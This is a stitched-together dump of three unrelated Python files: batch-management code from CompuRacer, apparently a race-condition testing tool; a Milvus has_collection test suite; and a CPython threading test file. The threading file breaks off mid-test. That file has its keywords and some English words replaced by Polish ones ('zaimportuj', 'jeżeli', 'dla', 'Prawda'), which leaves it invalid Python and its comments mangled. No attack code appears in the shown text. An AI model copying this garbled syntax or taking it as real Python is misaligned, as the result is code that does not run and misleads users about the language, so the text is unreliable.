for i in range(start_index, end_index + 1):
names.append(self.batch_index_to_name(self, i, indices))
if -1 in names:
return -1
return names
@staticmethod
def imp_batch_index_to_name(self, index, indices=None):
if index is None:
return -1
if not type(index) is int:
self.print_formatted(f"Batch index must be an integer! This is not the case: '{index}'", utils.QType.ERROR)
return -1
if not indices:
indices = self.list_exp_batch_files(self)
if index < 0 or index >= len(indices):
self.print_formatted(f"Batch index '{index}' does not exist!", utils.QType.ERROR)
return -1
return os.path.abspath(self.BATCHES_EXP_FILE_DIR + indices[index])
@staticmethod
def batch_index_to_name(self, index, indices=None):
if index is None:
if not self.state['current_batch']:
self.print_formatted(f"Cannot select current batch: There is no current batch!", utils.QType.ERROR)
return -1
return self.state["current_batch"]
if not type(index) is int:
self.print_formatted(f"Batch index must be an integer! This is not the case: '{index}'", utils.QType.ERROR)
return -1
if not indices:
indices = self.get_batch_indices()
if index < 0 or index >= len(indices):
self.print_formatted(f"Batch index '{index}' does not exist!", utils.QType.ERROR)
return -1
return indices[index]
@staticmethod # internal usage
def set_curr_batch_by_name(self, name, immediate_allowed=False):
if not immediate_allowed and name == self.immediate_batch_name:
self.print_formatted(f"Not allowed to set immediate batch as current batch from interface!", utils.QType.ERROR)
return -1
self.__change_state('current_batch', name)
self.print_formatted(f"Set current batch to batch with name '{name}'.", utils.QType.INFORMATION)
@staticmethod # internal usage
def comp_batch_resp_groups_by_name(self, batch_name, group_nr_1, group_nr_2, request_id=None):
try:
results, request_id = self.state['batches'][batch_name].compare_group_repr(group_nr_1, group_nr_2, request_id)
if not results or results == -1:
self.print_formatted(f"No results yet.", utils.QType.NONE)
else:
self.print_formatted(f"Comparison of result groups {group_nr_1} and {group_nr_2} in request '{request_id}' of batch '{batch_name}':", utils.QType.INFORMATION)
self.colorprint_comp_results(self, results)
except Exception as e:
self.print_formatted(f"{e}", utils.QType.ERROR)
return -1
@staticmethod # internal usage
def exp_batch_without_requests_by_name(self, folder, name):
the_batch = self.state['batches'][name]
# get batch as json-compatible dict
js_batch = self.jsonify_batch(the_batch)
exp_file = f"{name}.json"
exp_path = folder + exp_file
if os.path.exists(exp_path):
os.remove(exp_path)
with open(exp_path, 'w') as file:
utils.store_json_file(exp_path, js_batch)
@staticmethod # internal usage
def exp_batch_by_name(self, name):
self.print_formatted(f"Exporting batch '{name}'..", utils.QType.INFORMATION)
the_batch = self.state['batches'][name]
# get all required reqs
reqs = the_batch.get_reqs()
full_reqs = {}
for req in reqs:
full_reqs[req] = self.state['requests'][req]
# get batch as json-compatible dict
js_batch = self.jsonify_batch(the_batch)
js_batch['requests'] = full_reqs
if not os.path.exists(self.BATCHES_EXP_FILE_DIR):
os.mkdir(self.BATCHES_EXP_FILE_DIR)
exp_file = f"{name}.json"
if os.path.exists(self.BATCHES_EXP_FILE_DIR + exp_file):
randomness = utils.randomword(5)
self.print_formatted(f"Batch already exported once: adding randomness.", utils.QType.INFORMATION)
exp_file = exp_file.replace(".json", "") + "_random_" + randomness + ".json"
exp_path = self.BATCHES_EXP_FILE_DIR + exp_file
with open(exp_path, 'w') as file:
utils.store_json_file(exp_path, js_batch)
self.print_formatted(f"Batch exported successfully to '{exp_path}'", utils.QType.INFORMATION)
# open a dialog to pick a json file
@staticmethod
def select_files(self, title, extension):
if not os.path.exists(self.BATCHES_EXP_FILE_DIR):
os.mkdir(self.BATCHES_EXP_FILE_DIR)
start_dir = os.path.abspath(self.BATCHES_EXP_FILE_DIR)
filetypes = ("Target files", "*" + extension), ("all files", "*.*")
title = title + "(." + extension + ")"
self.dialog_queue.put({'title': title, 'filetypes': filetypes, 'start_dir': start_dir})
return self.dialog_queue.get()
@staticmethod
def imp_batch_without_requests_by_name(self, filename):
# load selected batch from file
batch_import = utils.load_json_file(filename)
if not batch_import:
self.print_formatted(
f"Cannot import batch: {filename}",
utils.QType.ERROR)
return -1
batch = self.objectify_batch(self, batch_import)
# adding the new batch
self.state['changed'] = True
if 'batches' not in self.state:
self.state['batches'] = {}
self.state['batches'][batch.name] = batch
#self.__change_state('batches', batch, sub_search=batch.name)
@staticmethod
def imp_batch_by_name(self, filename):
self.print_formatted(f"Importing batch file '{filename}'..", utils.QType.INFORMATION)
# load selected batch from file
batch_import = utils.load_json_file(filename)
batch = self.objectify_batch(self, batch_import)
if 'requests' not in batch_import:
self.print_formatted(
f"Cannot import batch: The file is missing the matching requests.\n\tIs this a state file maybe?",
utils.QType.WARNING)
return -1
requests = batch_import['requests']
# add the requests if necessary
self.print_formatted(f"Importing requests..", utils.QType.INFORMATION)
updated_ids = {}
for req_id, req in requests.items():
# remove the old id and fetch new
old_id = req_id
del req['id']
_, new_id = self.add_request(self, req, used_from_interface=True)
# the update key-method assumes the add_request method avoids collisions
if old_id != new_id:
updated_ids[old_id] = new_id
# update renewed ids in batch
if updated_ids:
batch.update_ids(updated_ids)
# add batch itself
was_current = False
while True:
if batch.name == self.immediate_batch_name:
self.print_formatted(f"You are not allowed to use the immediate batch name 'Imm'.", utils.QType.WARNING)
elif batch.name in self.state['batches']:
if self.command_processor.accept_yes_no(f"The batch name '{batch.name}' already exists, overwrite it?",
utils.QType.WARNING):
# removing current batch
if batch.name == self.state['current_batch']:
was_current = True
self.rem_batch_by_name(self, batch.name, True)
break
elif len(batch.name) > 0:
# a valid name!
break
batch.name = self.command_processor.accept_of_type("Please provide a new name for the batch:", str,
utils.QType.INFORMATION)
# adding the new batch
self.__change_state('batches', batch, sub_search=batch.name)
if was_current:
self.__change_state('current_batch', batch.name)
self.print_formatted(f"Batch '{batch.name}' with {len(requests.keys())} requests imported successfully.",
utils.QType.INFORMATION)
@staticmethod
def comm_batches_remove(self, first_index=None, last_index=None, immediate_allowed=False):
names = self.batch_indices_to_names(self, first_index, last_index)
if names == -1:
return -1
for name in names:
self.rem_batch_by_name(self, name, immediate_allowed)
@staticmethod
def rem_batch_by_name(self, name=None, immediate_allowed=False):
"""
Removes the batch with this name from the state
:param self: reference to the CompuRacer
:param name: name of the batch
:param immediate_allowed:
:return: 0 on success and -1 on error
"""
if name == -1:
return -1
if not immediate_allowed and name == self.immediate_batch_name:
self.print_formatted(f"Not allowed to remove immediate batch from interface!", utils.QType.ERROR)
return -1
is_current_batch = self.state['current_batch'] is not None and name == self.state['current_batch']
if immediate_allowed:
self.state['batches'][name].remove_the_files()
self.__change_state('batches', sub_search=name, do_delete=True)
if is_current_batch:
self.__change_state('current_batch', [])
else:
warning_string = f"Are you sure you want to remove the batch with name '{name}'?"
if is_current_batch:
warning_string += "\nThis is the current batch!"
if self.command_processor.accept_yes_no(warning_string, utils.QType.WARNING):
self.state['batches'][name].remove_the_files()
if not self.remove_batch_file(self, name):
self.print_formatted(f"Cannot remove old batch file from state, please make sure it is gone.",
utils.QType.WARNING)
self.__change_state('batches', sub_search=name, do_delete=True)
if is_current_batch:
self.__change_state('current_batch', [])
self.print_formatted(f"Batch with name '{name}' is removed.", utils.QType.INFORMATION)
else:
self.print_formatted(f"Removal of batch cancelled.", utils.QType.INFORMATION)
@staticmethod
def format_request_form_body(the_request):
the_request = copy.deepcopy(the_request)
# sort and decode cookies
if 'Cookie' in the_request['headers']:
cookies = urllib.parse.unquote(the_request['headers']['Cookie']).split("; ")
cookies = sorted(cookies)
the_request['headers']['Cookie'] = "; ".join(cookies)
# format body
if 'body' in the_request and len(the_request['body']) > 0:
if type(the_request['body']) is dict:
return the_request
if 'Content-Type' in the_request['headers'] and \
(the_request['headers']['Content-Type'].startswith("multipart/form-data") or
the_request['headers']['Content-Type'].startswith("application/x-www-form-urlencoded")):
key_values = [key_values.split("=") for key_values in the_request['body'].split("&")]
new_body = {}
for key_value in key_values:
if len(key_value) < 2:
# skip invalid keys
continue
new_body[urllib.parse.unquote(key_value[0])] = urllib.parse.unquote(key_value[1])
the_request['body'] = new_body
return the_request
@staticmethod
def list_exp_batch_files(self):
return sorted(list(os.listdir(self.BATCHES_EXP_FILE_DIR)))
@staticmethod
def remove_batch_file(self, name):
for file in os.listdir(self.CLIENT_BATCHES_LOC):
if file == name + ".json":
os.remove(self.CLIENT_BATCHES_LOC + file)
return True
return False
# -------------------------------------------------------------------------------------------------------- #
# ------------------------------------- Curr batch command functions ------------------------------------- #
# -------------------------------------------------------------------------------------------------------- #
@staticmethod
def comm_curr_get_contents(self, full_contents=False):
"""
Gets the requests and their settings of the current batch
:param self: reference to the CompuRacer
:param full_contents: if True, shows the parallel and sequntial settings visually
:return: 0 on success and -1 on error
"""
return self.comm_batches_get_contents(self, None, full_contents)
@staticmethod
def comm_curr_change_redirects(self, enable_redirects=True):
"""
Changes whether the current batch follows redirects when sending requests
:param self: reference to the CompuRacer
:param enable_redirects: if True, it follows redirects
:return: 0 on success and -1 on error
"""
if not self.state['current_batch']:
self.print_formatted(f"Cannot add change redirects of current batch: There is no current batch!", utils.QType.ERROR)
return -1
self.state['batches'][self.state['current_batch']].set_allow_redirects(enable_redirects)
self.print_formatted(f"Set follow redirects of current batch to: '{enable_redirects}'", utils.QType.INFORMATION)
@staticmethod
def comm_curr_change_sync(self, enable_sync=True):
"""
Changes whether the current batch syncs the last byte of the request content (if any)
:param self: reference to the CompuRacer
:param enable_sync: if True, it syncs the last byte
:return: 0 on success and -1 on error
"""
if not self.state['current_batch']:
self.print_formatted(f"Cannot add change last byte sync of current batch: There is no current batch!", utils.QType.ERROR)
return -1
self.state['batches'][self.state['current_batch']].set_sync_last_byte(enable_sync)
self.print_formatted(f"Set last byte sync of current batch to: '{enable_sync}'", utils.QType.INFORMATION)
@staticmethod
def comm_curr_change_timeout(self, send_timeout=20):
"""
Sets the current batch send timout (default 20 seconds).
:param self: reference to the CompuRacer
:param send_timeout: the send timeout
:return: 0 on success and -1 on error
"""
if not self.state['current_batch']:
self.print_formatted(f"Cannot add change send timeout of current batch: There is no current batch!", utils.QType.ERROR)
return -1
if send_timeout < 1:
self.print_formatted(f"The send timeout must be >= 1! Input: {send_timeout} seconds", utils.QType.ERROR)
return -1
self.state['batches'][self.state['current_batch']].set_send_timeout(send_timeout)
self.print_formatted(f"Set send timeout of current batch to: '{send_timeout}'", utils.QType.INFORMATION)
@staticmethod
def comm_curr_get_results(self, get_tables=False, get_groups=False):
"""
Get the latest results of the current batch
:param self: reference to the CompuRacer
:param get_tables: whether to include summary tables about the results
:param get_groups: whether to show the group representatives
:return: 0 on success and -1 on error
"""
return self.comm_batches_get_results(self, None, get_tables, get_groups)
@staticmethod
def comm_curr_compare_groups(self, group_nr_1, group_nr_2, request_id=None):
"""
Within the current batch, it compares the result group representatives selected
:param self: reference to the CompuRacer
:param group_nr_1: the first group id to compare
:param group_nr_2: the second group id to compare
:param request_id: the request id, or if None, the first request of the batch (alphabetically)
:return: 0 on success and -1 on error
"""
return self.comm_batches_comp_resp_groups(self, None, group_nr_1, group_nr_2, request_id)
# NOTE: it does not overwrite an item with the same id & wait_time.
@staticmethod
def comm_curr_add(self, request_id, wait_time=0, dup_par=1, dup_seq=1):
"""
Adds the request with this wait time and the parallel and sequential values to the current batch
:param self: reference to the CompuRacer
:param request_id: the id of the request
:param wait_time: the wait time of the request before sending it
:param dup_par: the parallel duplication
:param dup_seq: the parallel sequential
:return: 0 on success and -1 on error
:return:
"""
if request_id not in self.state['requests']:
self.print_formatted(f"Cannot add a request to current batch: The request with id '{request_id}' is not in the request list!",
utils.QType.ERROR)
return -1
if not self.state['current_batch']:
self.print_formatted(f"Cannot add a request to current batch: There is no current batch! First, select a current batch.", utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
try:
curr_batch.add(request_id, wait_time, dup_par, dup_seq, False)
except Exception as e:
self.print_formatted(f"Cannot add a request to current batch:\n\t{e}", utils.QType.ERROR)
return -1
self.print_formatted(f"The request was added to the current batch:\n"
f"{curr_batch.get_info(request_id, wait_time)}",
utils.QType.INFORMATION)
# NOTE: it does not overwrite an item with the same id & wait_time.
@staticmethod
def comm_curr_update(self, request_id, wait_time=0, dup_par=1, dup_seq=1):
"""
Updates the parallel and sequential values of the request with this wait_time in the current batch
:param self: reference to the CompuRacer
:param request_id: the id of the request
:param wait_time: the wait time of the request before sending it
:param dup_par: the parallel duplication
:param dup_seq: the parallel sequential
:return: 0 on success and -1 on error
"""
if request_id not in self.state['requests']:
self.print_formatted(
f"Cannot update a request in the current batch: The request with id '{request_id}' is not in this batch!",
utils.QType.ERROR)
return -1
if not self.state['current_batch']:
self.print_formatted(
f"Cannot update a request in the current batch: There is no current batch! First, select a current batch.",
utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
try:
old_state = curr_batch.get_info(request_id, wait_time)
curr_batch.add(request_id, wait_time, dup_par, dup_seq, True)
except Exception as e:
self.print_formatted(f"Cannot update request in current batch:\n\t{e}", utils.QType.ERROR)
return -1
self.print_formatted(f"The request was updated in the current batch:\n"
f"Old: {old_state}\n"
f"New: {curr_batch.get_info(request_id, wait_time)}\n",
utils.QType.INFORMATION)
@staticmethod
def comm_curr_get_ignore(self):
if not self.state['current_batch']:
self.print_formatted(
f"Cannot get ignored fields in grouping of results in the current batch:\n"
f"\tThere is no current batch! First, select a current batch.",
utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
fields = curr_batch.get_ignored_fields()
self.print_formatted(f"The ignored fields in grouping of results in the current batch:\n\t"
f"{fields}\n", utils.QType.INFORMATION)
@staticmethod
def comm_curr_add_ignore(self, field_name):
if not self.state['current_batch']:
self.print_formatted(
f"Cannot add field to ignored fields in grouping of results in the current batch:\n"
f"\tThere is no current batch! First, select a current batch.",
utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
if curr_batch.add_ignored_field(field_name) == -1:
self.print_formatted(
f"Cannot add field to ignored fields in grouping of results in the current batch:\n"
f"\tThe field is already ignored!",
utils.QType.WARNING)
return -1
self.print_formatted(f"Successfully added the ignored field '{field_name}' "
f"in grouping of results in the current batch", utils.QType.INFORMATION)
@staticmethod
def comm_curr_reset_ignore(self):
if not self.state['current_batch']:
self.print_formatted(
f"Cannot add field to ignored fields in grouping of results in the current batch:\n"
f"\tThere is no current batch! First, select a current batch.",
utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
if curr_batch.reset_ignored_fields() == -1:
self.print_formatted(
f"Cannot reset ignored fields in grouping of results in the current batch:\n"
f"\tThey are already the default values.",
utils.QType.WARNING)
return -1
fields = curr_batch.get_ignored_fields()
self.print_formatted(f"Successfully resetted the ignored fields in grouping of results in the current batch:\n\t"
f"{fields}\n", utils.QType.INFORMATION)
@staticmethod
def comm_curr_remove(self, request_id=None, wait_time=None):
"""
Removes requests from the current batch
:param self: reference to the CompuRacer
:param request_id: the request to remove, or if None, all requests
:param wait_time: the wait_time of the request to remove, or if None, all regardless of wait_time
:return: 0 on success and -1 on error
"""
if not self.state['current_batch']:
self.print_formatted(f"Cannot remove a request from current batch: There is no current batch! First, select a current batch.", utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
if curr_batch.is_empty():
self.print_formatted(f"Cannot remove a request from current batch: The current batch is empty!", utils.QType.ERROR)
return -1
if request_id is None:
# remove all items from the batch
question = "Are you sure you want to remove all requests from the current batch?"
elif wait_time is None:
# remove all items with a certain ID from the batch
question = f"Are you sure you want to remove all requests with id '{request_id}' from the current batch?"
else:
# remove a specific item with a certain ID and wait_time from the batch
question = f"Are you sure you want to remove the request with id '{request_id}' and wait_time '{wait_time}' from the current batch?"
if self.command_processor.accept_yes_no(question, utils.QType.WARNING):
num_removed = curr_batch.remove(request_id, wait_time)
self.print_formatted(f"All matching requests are removed from the current batch.\nNumber: {num_removed}", utils.QType.INFORMATION)
else:
self.print_formatted(f"Removal of current batch requests cancelled.", utils.QType.INFORMATION)
# ------------------------------------------------------------------------------------------------- #
# ------------------------------------- Main helper functions ------------------------------------- #
# ------------------------------------------------------------------------------------------------- #
# used by REST server
def add_request_from_json(self, a_json_request):
self.add_request(self, utils.read_json(a_json_request))
# used by REST server
def trigger_immediate(self):
if self.immediate_batch_name not in self.state['batches']:
return -1
if self.state['immediate_mode'] == "on":
# send the immediate batch
return self.comm_batches_send(self, self.get_index_by_name(self.immediate_batch_name), self.state['immediate_print'], True)
def get_batch_indices(self):
return sorted(self.state['batches'].keys())
def get_index_by_name(self, name):
if name in self.state['batches']:
return self.get_batch_indices().index(name)
else:
return -1
# ------------------------------------------------------------------------------------------------ #
# --------------------------- Print, convert, load and store functions --------------------------- #
# ------------------------------------------------------------------------------------------------ #
@staticmethod
def jsonify_batches(the_state):
"""
Makes sure the batch content in the state can be saved as JSON.
It will change a dict with tuple-keys to an array of key and value tuples
:param the_state: reference to the CompuRacer state
:return: the updated state
"""
if not the_state['batches']:
return the_state
for name in the_state['batches'].keys():
the_state['batches'][name] = the_state['batches'][name].get_as_dict()
return the_state
@staticmethod
def jsonify_batch(the_batch):
"""
Makes sure the content of this batch can be saved as JSON.
It will change a dict with tuple-keys to an array of key and value tuples
:param the_batch: the batch to update
:return: the updated batch
"""
return the_batch.get_as_dict()
@staticmethod
def objectify_batches(self, the_state):
"""
Undoes the jsonify_batches function.
:param the_state: reference to the CompuRacer state
:return: the updated state
"""
if not the_state['batches']:
return the_state
for name in the_state['batches'].keys():
the_state['batches'][name] = self.objectify_batch(self, the_state['batches'][name])
return the_state
@staticmethod
def objectify_batch(self, the_batch):
"""
Undoes the jsonify_batch function.
:param the_batch: the batch to update
:return: the updated batch
"""
return Batch.create_from_dict(the_batch, self.BATCHES_RENDERED_FILE_DIR)
# should only be called by command handlers with print_buffered=False
def print_formatted_multi(self, text, default_type=utils.QType.NONE, special_types=None, print_buffered=False):
if special_types is None:
special_types = dict()
for line in text.split("\n"):
string_type = default_type
for matcher in special_types.keys():
if re.search(matcher, line):
string_type = special_types[matcher]
if print_buffered:
self.command_processor.print_queued(line, string_type)
else:
self.command_processor.print_formatted(line, string_type)
# should only be called by command handlers with print_buffered=False
def print_formatted(self, text, string_type=utils.QType.NONE, print_buffered=False):
if print_buffered:
self.command_processor.print_queued(text, string_type)
else:
self.command_processor.print_formatted(text, string_type)
# should only be called by command handlers!
def __load_json(self, path, backup_path, msg=None):
return utils.load_json_file(path, backup_path, msg, self.state['colored_output'])
# should only be called by command handlers!
def __store_json(self, json_path, json_data, backup_path=None, msg=None):
utils.store_json_file(json_path, json_data, backup_path, msg, self.state['colored_output'])
# access function for state is used to avoid storing an unchanged state
def __change_state(self, variable, value=None, sub_search=None, do_delete=False):
self.state['changed'] = True
if sub_search is not None:
if do_delete and self.state[variable] is not None and sub_search in self.state[variable]:
del self.state[variable][sub_search]
else:
if variable not in self.state or self.state[variable] is None:
self.state[variable] = {}
self.state[variable][sub_search] = value
else:
if do_delete and self.state is not None and variable in self.state:
del self.state[variable]
else:
self.state[variable] = value
def check_state(racer):
while not racer.is_shutdown:
if racer.state and 'batches' in racer.state and racer.state['batches']:
if not type(list(racer.state['batches'].values())[0]) is Batch:
print("Batches dictified!!!")
break
time.sleep(0.1)
# -------------- main client program & server -------------- #
if __name__ == '__main__':
dialog_queue = Queue()
# initialize the racer
racer = CompuRacer(dialog_queue)
threading.Thread(target=check_state, args=(racer,)).start()
# start the racer
racer.start()
# listen for dialogs
while not racer.is_shutdown:
try:
new_dialog_req = dialog_queue.get(timeout=2)
except queue.Empty:
pass
except Exception as e:
print(e)
else:
dialog_queue.put(filedialog.askopenfilename(
filetypes=new_dialog_req['filetypes'],
title=new_dialog_req['title'],
initialdir=new_dialog_req['start_dir'],
multiple=True
))
root.update()
# exit normally
exit(0)
|
test_has_collection.py
|
import pdb
import pytest
import logging
import itertools
import threading
import time
from multiprocessing import Process
from utils import *
from constants import *
uid = "has_collection"
class TestHasCollection:
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_collection(self, connect, collection):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
assert connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_without_connection(self, collection, dis_connect):
'''
target: test has collection, without connection
method: calling has collection with correct params, with a disconnected instance
expected: has collection raise exception
'''
with pytest.raises(Exception) as e:
assert dis_connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_collection_not_existed(self, connect):
'''
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by has_collection method
expected: False
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
assert connect.has_collection(collection_name)
connect.drop_collection(collection_name)
assert not connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multithread(self, connect):
'''
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
'''
threads_num = 4
threads = []
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
def has():
assert connect.has_collection(collection_name)
# assert not assert_collection(connect, collection_name)
for i in range(threads_num):
t = MyThread(target=has, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestHasCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_empty_collection_name(self, connect):
collection_name = ''
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_none_collection_name(self, connect):
collection_name = None
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
|
test_threading.py
|
"""
Tests dla the threading module.
"""
zaimportuj test.support
z test.support zaimportuj verbose, strip_python_stderr, import_module, cpython_only
z test.support.script_helper zaimportuj assert_python_ok, assert_python_failure
zaimportuj random
zaimportuj re
zaimportuj sys
_thread = import_module('_thread')
threading = import_module('threading')
zaimportuj time
zaimportuj unittest
zaimportuj weakref
zaimportuj os
zaimportuj subprocess
z test zaimportuj lock_tests
# Between fork() oraz exec(), only async-safe functions are allowed (issues
# #12316 oraz #11870), oraz fork() z a worker thread jest known to trigger
# problems przy some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'hp-ux11')
# A trivial mutable counter.
klasa Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
zwróć self.value
klasa TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
jeżeli verbose:
print('task %s will run dla %.1f usec' %
(self.name, delay * 1e6))
przy self.sema:
przy self.mutex:
self.nrunning.inc()
jeżeli verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertPrawda(self.nrunning.get() <= 3)
time.sleep(delay)
jeżeli verbose:
print('task', self.name, 'done')
przy self.mutex:
self.nrunning.dec()
self.testcase.assertPrawda(self.nrunning.get() >= 0)
jeżeli verbose:
print('%s jest finished. %d tasks are running' %
(self.name, self.nrunning.get()))
klasa BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
klasa ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
dla i w range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, Nic)
self.assertPrawda(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
jeżeli verbose:
print('waiting dla all tasks to complete')
dla t w threads:
t.join()
self.assertPrawda(nie t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertNieprawda(t.ident jest Nic)
self.assertPrawda(re.match('<TestThread\(.*, stopped -?\d+\)>',
repr(t)))
jeżeli verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work dla the main thread oraz dummy threads.
self.assertNieprawda(threading.currentThread().ident jest Nic)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
_thread.start_new_thread(f, ())
done.wait()
self.assertNieprawda(ident[0] jest Nic)
# Kill the "immortal" _DummyThread
usuń threading._active[ident[0]]
# run przy a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
jeżeli verbose:
print('przy 256kB thread stack size...')
spróbuj:
threading.stack_size(262144)
wyjąwszy _thread.error:
podnieś unittest.SkipTest(
'platform does nie support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run przy a large thread stack size (1MB)
def test_various_ops_large_stack(self):
jeżeli verbose:
print('przy 1MB thread stack size...')
spróbuj:
threading.stack_size(0x100000)
wyjąwszy _thread.error:
podnieś unittest.SkipTest(
'platform does nie support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry dla the foreign
# thread to get made w the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = _thread.start_new_thread(f, (mutex,))
# Wait dla the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
usuń threading._active[tid]
# PyThreadState_SetAsyncExc() jest a CPython-only gimmick, nie (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
klasa AsyncExc(Exception):
dalej
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception z the same thread.
tid = threading.get_ident()
spróbuj:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception jest async, so we might have to keep the VM busy until
# it notices.
dopóki Prawda:
dalej
wyjąwszy AsyncExc:
dalej
inaczej:
# This code jest unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc nie podnieśd")
spróbuj:
self.assertEqual(result, 1) # one thread state modified
wyjąwszy UnboundLocalError:
# The exception was podnieśd too quickly dla us to get the result.
dalej
# `worker_started` jest set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` jest set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
klasa Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = Nieprawda
spróbuj:
dopóki Prawda:
worker_started.set()
time.sleep(0.1)
wyjąwszy AsyncExc:
self.finished = Prawda
worker_saw_exception.set()
t = Worker()
t.daemon = Prawda # so jeżeli this fails, we don't hang Python at shutdown
t.start()
jeżeli verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
jeżeli verbose:
print(" trying nonsensical thread id")
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now podnieś an exception w the worker thread.
jeżeli verbose:
print(" waiting dla worker thread to get started")
ret = worker_started.wait()
self.assertPrawda(ret)
jeżeli verbose:
print(" verifying worker hasn't exited")
self.assertPrawda(nie t.finished)
jeżeli verbose:
print(" attempting to podnieś asynch exception w worker")
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
jeżeli verbose:
print(" waiting dla worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertPrawda(t.finished)
jeżeli verbose:
print(" all OK -- joining worker")
jeżeli t.finished:
t.join()
# inaczej the thread jest still running, oraz we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
podnieś threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
spróbuj:
t = threading.Thread(target=lambda: Nic)
self.assertRaises(threading.ThreadError, t.start)
self.assertNieprawda(
t w threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
w_końcu:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """jeżeli 1:
zaimportuj ctypes, sys, time, _thread
# This lock jest used jako a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ jest run
# So we save the functions w klasa dict
klasa C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread jest waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """jeżeli 1:
zaimportuj sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
zaimportuj os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = Prawda
t.start()
# This jest the trace function
def func(frame, event, arg):
threading.current_thread()
zwróć func
sys.settrace(func)
